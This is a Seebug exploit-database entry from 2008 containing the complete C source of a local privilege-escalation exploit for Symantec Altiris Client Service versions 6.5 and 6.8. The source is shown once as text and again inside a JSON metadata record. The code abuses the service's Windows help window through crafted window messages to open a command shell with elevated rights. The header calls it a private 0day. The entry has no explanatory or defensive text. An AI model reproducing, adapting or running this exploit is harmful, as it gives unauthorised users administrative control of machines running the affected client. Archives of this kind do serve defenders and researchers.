ID SSV:8460
Type seebug
Reporter Root
Modified 2008-05-17T00:00:00
Description
No description provided by source.
// 0day PRIVATE NOT DISTRIBUTE!!!
//
// Symantec Altiris Client Service Local Exploit (0day)
//
// Affected Versions : Altiris Client 6.5.248
// Altiris Client 6.5.299
// Altiris client 6.8.378
//
// Alex Hernandez aka alt3kx
// ahernandez [at] sybsecurity.com
//
// Eduardo Vela aka sirdarckcat
// sirdarckcat [at] gmail.com
//
// We'll see you soon at ph-neutral 0x7d8
#include "stdio.h"
#include "windows.h"
int main(int argc, char* argv[])
{
HWND lHandle, lHandle2;
POINT point;
int id,a=0;
char langH[255][255];
char langO[255][255];
char wname[]="Altiris Client Service";
strcpy(langH[0x0c],"Aide de Windows");
strcpy(langH[0x09],"Windows Help");
strcpy(langH[0x0a],"Ayuda de Windows");
strcpy(langO[0x0c],"Ouvrir");
strcpy(langO[0x09],"Open");
strcpy(langO[0x0a],"Abrir");
printf("##########################################################\n");
printf("# Altiris Client Service #\n");
printf("# WM_COMMANDHELP Windows Privilege Escalation Exploit #\n");
printf("# by sirdarckcat & alt3kx #\n");
printf("# #\n");
printf("# This exploit is based on www.milw0rm.com/exploits/350 #\n");
printf("# Utility Manager Privilege Elevation Exploit (MS04-019) #\n");
printf("# by Cesar Cerrudo #\n");
printf("##########################################################\n\n");
id=PRIMARYLANGID(GetSystemDefaultLangID());
if (id==0 && (id=PRIMARYLANGID(GetUserDefaultLangID()))){
printf("Lang not found, using english\n");
id=9;
}
char sText[]="%windir%\\system32\\cmd.ex?";
if (argc<2){
printf("Use:\n> %s [LANG-ID]\n\n",argv[0]);
printf("Look for your LANG-ID here:\n");
printf("http://msdn2.microsoft.com/en-us/library/ms776294.aspx\n");
printf("\nAnyway, the program will try to guess it.\n\n");
return 0;
}else{
if (argc==2){
if (langH[atoi(argv[1])]){
id=atoi(argv[1]);
printf("Lang changed\n");
}else{
printf("Lang not supported\n",id);
}
}
}
printf("Using Lang %d\n",id);
printf("Looking for %s..\n",wname);
lHandle=FindWindow(NULL, wname);
if (!lHandle) {
printf("Window %s not found\n", wname);
return 0;
}else{
printf("Found! exploiting..\n");
}
PostMessage(lHandle,0x313,NULL,NULL);
Sleep(100);
SendMessage(lHandle,0x365,NULL,0x1);
Sleep(300);
pp:
if (!FindWindow(NULL, langH[id])){
printf("Help Window not found.. exploit unsuccesful\n");
if (id!=9){
printf("Trying with english..\n");
id=9;
goto pp;
}else{
return 0;
}
}else{
printf("Help Window found! exploiting..\n");
}
SendMessage (FindWindow(NULL, langH[id]), WM_IME_KEYDOWN, VK_RETURN, 0);
Sleep(500);
lHandle = FindWindow("#32770",langO[id]);
lHandle2 = GetDlgItem(lHandle, 0x47C);
Sleep(500);
printf("Sending path..\n");
SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
Sleep(800);
SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);
lHandle2 = GetDlgItem(lHandle, 0x4A0);
printf("Looking for cmd..\n");
SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
Sleep(500);
lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
lHandle2 = GetDlgItem(lHandle2, 0x1);
printf("Sending keys..\n");
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0);
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0);
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0);
Sleep(500);
mark:
PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
Sleep(1000);
point.x =10; point.y =30;
lHandle2=WindowFromPoint(point);
Sleep(1000);
printf("Opening shell..\n");
SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);
Sleep(1000);
SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);
Sleep(1000);
SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0);
Sleep(1000);
if (!FindWindow(NULL,"C:\\WINDOWS\\system32\\cmd.exe") && !FindWindow(NULL,"C:\\WINNT\\system32\\cmd.exe")){
printf("Failed\n");
if (!a){
a++;
goto mark;
}
}else{
printf("Done!\n");
}
if(!a){
SendMessage (lHandle, WM_CLOSE,0,0);
Sleep(500);
SendMessage (FindWindow(NULL, langH[id]), WM_CLOSE, 0, 0);
SendMessage (FindWindow(NULL, argv[1]), WM_CLOSE, 0, 0);
}else{
printf("The exploit failed, but maybe the context window of the shell is visibile.\n");
}
return 0;
}
{"sourceData": "\n //\u00a00day\u00a0PRIVATE\u00a0NOT\u00a0DISTRIBUTE!!!\r\n//\r\n//\u00a0Symantec\u00a0Altiris\u00a0Client\u00a0Service\u00a0Local\u00a0Exploit\u00a0(0day)\u00a0\r\n//\r\n//\u00a0Affected\u00a0Versions\t:\u00a0Altiris\u00a0Client\u00a06.5.248\r\n//\t\t\t\u00a0\u00a0Altiris\u00a0Client\u00a06.5.299\r\n//\t\t\t\u00a0\u00a0Altiris\u00a0client\u00a06.8.378\r\n//\r\n//\u00a0Alex\u00a0Hernandez\u00a0aka\u00a0alt3kx\u00a0\r\n//\u00a0ahernandez\u00a0[at]\u00a0sybsecurity.com\r\n//\r\n//\u00a0Eduardo\u00a0Vela\u00a0aka\u00a0sirdarckcat\u00a0\r\n//\u00a0sirdarckcat\u00a0[at]\u00a0gmail.com\r\n//\r\n//\u00a0We'll\u00a0see\u00a0you\u00a0soon\u00a0at\u00a0ph-neutral\u00a00x7d8\r\n\r\n#include\u00a0"stdio.h"\r\n#include\u00a0"windows.h"\r\n\r\nint\u00a0main(int\u00a0argc,\u00a0char*\u00a0argv[])\r\n{\r\n\u00a0HWND\u00a0lHandle,\u00a0lHandle2;\r\n\u00a0POINT\u00a0point;\r\n\u00a0int\u00a0id,a=0;\r\n\u00a0char\u00a0langH[255][255];\r\n\u00a0char\u00a0langO[255][255];\r\n\u00a0char\u00a0wname[]="Altiris\u00a0Client\u00a0Service";\r\n\u00a0\r\n\u00a0strcpy(langH[0x0c],"Aide\u00a0de\u00a0Windows");\r\n\u00a0strcpy(langH[0x09],"Windows\u00a0Help");\r\n\u00a0strcpy(langH[0x0a],"Ayuda\u00a0de\u00a0Windows");\r\n\u00a0\r\n\u00a0strcpy(langO[0x0c],"Ouvrir");\r\n\u00a0strcpy(langO[0x09],"Open");\r\n\u00a0strcpy(langO[0x0a],"Abrir");\r\n\u00a0\r\n\u00a0printf("##########################################################\\n");\r\n\u00a0printf("#\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Altiris\u00a0Client\u00a0Service\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0#\\n");\r\n\u00a0printf("#\u00a0WM_COMMANDHELP\u00a0Windows\u00a0Privilege\u00a0Escalation\u00a0Exploit\u00a0\u00a0\u00a0\u00a0#\\n");\r\n\u00a0printf("#\u00a0by\u00a0sirdarckcat\u00a0&\u00a0alt3kx\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0#\\n");\r\n\u00a0printf("#\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0#\\n");\r\n\u00a0printf("#\u00a0This\u00a0exploit\u00a0is\u00a0based\u00a0on\u00a0www.milw0rm.com/exploits/350\u00a0\u00a0#\\n");\r\n\u00a0printf("#\u00a0Utility\u00a0Manager\u00a0Privilege\u00a0Elevation\u00a0Exploit\u00a0(MS04-019)\u00a0#\\n");\r\n\u00a0printf("#\u00a0by\u00a0Cesar\u00a0Cerrudo\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0#\\n");\r\n\u00a0printf("##########################################################\\n\\n");\r\n\u00a0\u00a0\r\n\u00a0id=PRIMARYLANGID(GetSystemDefaultLangID());\r\n\u00a0if\u00a0(id==0\u00a0&&\u00a0(id=PRIMARYLANGID(GetUserDefaultLangID()))){\r\n\u00a0\u00a0\u00a0\u00a0printf("Lang\u00a0not\u00a0found,\u00a0using\u00a0english\\n");\r\n\u00a0\u00a0\u00a0\u00a0id=9;\r\n\u00a0}\r\n\r\n\u00a0char\u00a0sText[]="%windir%\\\\system32\\\\cmd.ex?";\r\n\r\n\u00a0if\u00a0(argc<2){\r\n\u00a0\u00a0\u00a0\u00a0printf("Use:\\n>\u00a0%s\u00a0[LANG-ID]\\n\\n",argv[0]);\r\n\u00a0\u00a0\u00a0\u00a0printf("Look\u00a0for\u00a0your\u00a0LANG-ID\u00a0here:\\n");\r\n\u00a0\u00a0\u00a0\u00a0printf("http://msdn2.microsoft.com/en-us/library/ms776294.aspx\\n");\r\n\u00a0\u00a0\u00a0\u00a0printf("\\nAnyway,\u00a0the\u00a0program\u00a0will\u00a0try\u00a0to\u00a0guess\u00a0it.\\n\\n");\r\n\u00a0\u00a0\u00a0\u00a0return\u00a00;\r\n\u00a0}else{\r\n\u00a0\u00a0\u00a0\u00a0if\u00a0(argc==2){\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if\u00a0(langH[atoi(argv[1])]){\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0id=atoi(argv[1]);\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0printf("Lang\u00a0changed\\n");\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0}else{\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0printf("Lang\u00a0not\u00a0supported\\n",id);\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0}\r\n\u00a0\u00a0\u00a0\u00a0}\r\n\u00a0}\r\n\u00a0printf("Using\u00a0Lang\u00a0%d\\n",id);\r\n\u00a0printf("Looking\u00a0for\u00a0%s..\\n",wname);\r\n\u00a0lHandle=FindWindow(NULL,\u00a0wname);\u00a0\u00a0\u00a0\r\n\u00a0if\u00a0(!lHandle)\u00a0{\r\n\u00a0\u00a0printf("Window\u00a0%s\u00a0not\u00a0found\\n",\u00a0wname);\r\n\u00a0\u00a0return\u00a00;\r\n\u00a0}else{\r\n\u00a0\u00a0printf("Found!\u00a0exploiting..\\n");\r\n\u00a0}\r\n\u00a0PostMessage(lHandle,0x313,NULL,NULL);\r\n\u00a0\r\n\u00a0Sleep(100);\r\n\r\n\u00a0SendMessage(lHandle,0x365,NULL,0x1);\r\n\u00a0Sleep(300);\r\n\u00a0pp:\r\n\u00a0if\u00a0(!FindWindow(NULL,\u00a0langH[id])){\r\n\u00a0\u00a0\u00a0\u00a0printf("Help\u00a0Window\u00a0not\u00a0found..\u00a0exploit\u00a0unsuccesful\\n");\r\n\u00a0\u00a0\u00a0\u00a0if\u00a0(id!=9){\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0printf("Trying\u00a0with\u00a0english..\\n");\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0id=9;\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0goto\u00a0pp;\r\n\u00a0\u00a0\u00a0\u00a0}else{\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return\u00a00;\r\n\u00a0\u00a0\u00a0\u00a0}\u00a0\r\n\u00a0}else{\r\n\u00a0\u00a0\u00a0\u00a0printf("Help\u00a0Window\u00a0found!\u00a0exploiting..\\n");\r\n\u00a0}\u00a0\r\n\u00a0SendMessage\u00a0(FindWindow(NULL,\u00a0langH[id]),\u00a0WM_IME_KEYDOWN,\u00a0VK_RETURN,\u00a00);\r\n\u00a0Sleep(500);\r\n\u00a0lHandle\u00a0=\u00a0FindWindow("#32770",langO[id]);\r\n\u00a0lHandle2\u00a0=\u00a0GetDlgItem(lHandle,\u00a00x47C);\r\n\u00a0Sleep(500);\r\n\u00a0printf("Sending\u00a0path..\\n");\r\n\u00a0SendMessage\u00a0(lHandle2,\u00a0WM_SETTEXT,\u00a00,\u00a0(LPARAM)sText);\r\n\u00a0Sleep(800);\r\n\u00a0SendMessage\u00a0(lHandle2,\u00a0WM_IME_KEYDOWN,\u00a0VK_RETURN,\u00a00);\r\n\u00a0lHandle2\u00a0=\u00a0GetDlgItem(lHandle,\u00a00x4A0);\r\n\u00a0printf("Looking\u00a0for\u00a0cmd..\\n");\u00a0\r\n\u00a0SendMessage\u00a0(lHandle2,\u00a0WM_IME_KEYDOWN,\u00a0VK_TAB,\u00a00);\r\n\u00a0Sleep(500);\r\n\u00a0lHandle2\u00a0=\u00a0FindWindowEx(lHandle,NULL,"SHELLDLL_DefView",\u00a0NULL);\r\n\u00a0lHandle2\u00a0=\u00a0GetDlgItem(lHandle2,\u00a00x1);\r\n\u00a0printf("Sending\u00a0keys..\\n");\r\n\u00a0SendMessage\u00a0(lHandle2,\u00a0WM_IME_KEYDOWN,\u00a00x43,\u00a00);\r\n\u00a0SendMessage\u00a0(lHandle2,\u00a0WM_IME_KEYDOWN,\u00a00x4D,\u00a00);\r\n\u00a0SendMessage\u00a0(lHandle2,\u00a0WM_IME_KEYDOWN,\u00a00x44,\u00a00);\r\n\u00a0Sleep(500);\r\n\u00a0mark:\r\n\u00a0PostMessage\u00a0(lHandle2,\u00a0WM_CONTEXTMENU,\u00a00,\u00a00);\r\n\u00a0Sleep(1000);\r\n\u00a0point.x\u00a0=10;\u00a0point.y\u00a0=30;\r\n\u00a0lHandle2=WindowFromPoint(point);\r\n\u00a0\u00a0Sleep(1000);\r\n\u00a0printf("Opening\u00a0shell..\\n");\r\n\u00a0SendMessage\u00a0(lHandle2,\u00a0WM_KEYDOWN,\u00a0VK_DOWN,\u00a00);\r\n\u00a0\u00a0Sleep(1000);\r\n\u00a0SendMessage\u00a0(lHandle2,\u00a0WM_KEYDOWN,\u00a0VK_DOWN,\u00a00);\r\n\u00a0\u00a0Sleep(1000);\r\n\u00a0SendMessage\u00a0(lHandle2,\u00a0WM_KEYDOWN,\u00a0VK_RETURN,\u00a00);\r\n\u00a0\u00a0Sleep(1000);\r\n\u00a0if\u00a0(!FindWindow(NULL,"C:\\\\WINDOWS\\\\system32\\\\cmd.exe")\u00a0&&\u00a0!FindWindow(NULL,"C:\\\\WINNT\\\\system32\\\\cmd.exe")){\r\n\u00a0\u00a0\u00a0\u00a0printf("Failed\\n");\r\n\u00a0\u00a0\u00a0\u00a0if\u00a0(!a){\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0a++;\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0goto\u00a0mark;\r\n\u00a0\u00a0\u00a0\u00a0}\r\n\u00a0}else{\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0printf("Done!\\n");\r\n\u00a0}\r\n\u00a0if(!a){\r\n\u00a0\u00a0\u00a0\u00a0SendMessage\u00a0(lHandle,\u00a0WM_CLOSE,0,0);\r\n\u00a0\u00a0\u00a0\u00a0Sleep(500);\r\n\u00a0\u00a0\u00a0\u00a0SendMessage\u00a0(FindWindow(NULL,\u00a0langH[id]),\u00a0WM_CLOSE,\u00a00,\u00a00);\r\n\u00a0\u00a0\u00a0\u00a0SendMessage\u00a0(FindWindow(NULL,\u00a0argv[1]),\u00a0WM_CLOSE,\u00a00,\u00a00);\r\n\u00a0}else{\r\n\u00a0\u00a0\u00a0\u00a0printf("The\u00a0exploit\u00a0failed,\u00a0but\u00a0maybe\u00a0the\u00a0context\u00a0window\u00a0of\u00a0the\u00a0shell\u00a0is\u00a0visibile.\\n");\r\n\u00a0}\r\n\u00a0return\u00a00;\r\n}\n ", "status": "poc", "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-8460", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-8460", "type": "seebug", "viewCount": 4, "references": [], "lastseen": "2017-11-19T21:41:56", "published": "2008-05-17T00:00:00", "cvelist": [], "id": "SSV:8460", "enchantments_done": [], "modified": "2008-05-17T00:00:00", "title": "Symantec Altiris Client Service 6.8.378 Local Privilege Escalation Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.3, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.3}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645572444}}
{}
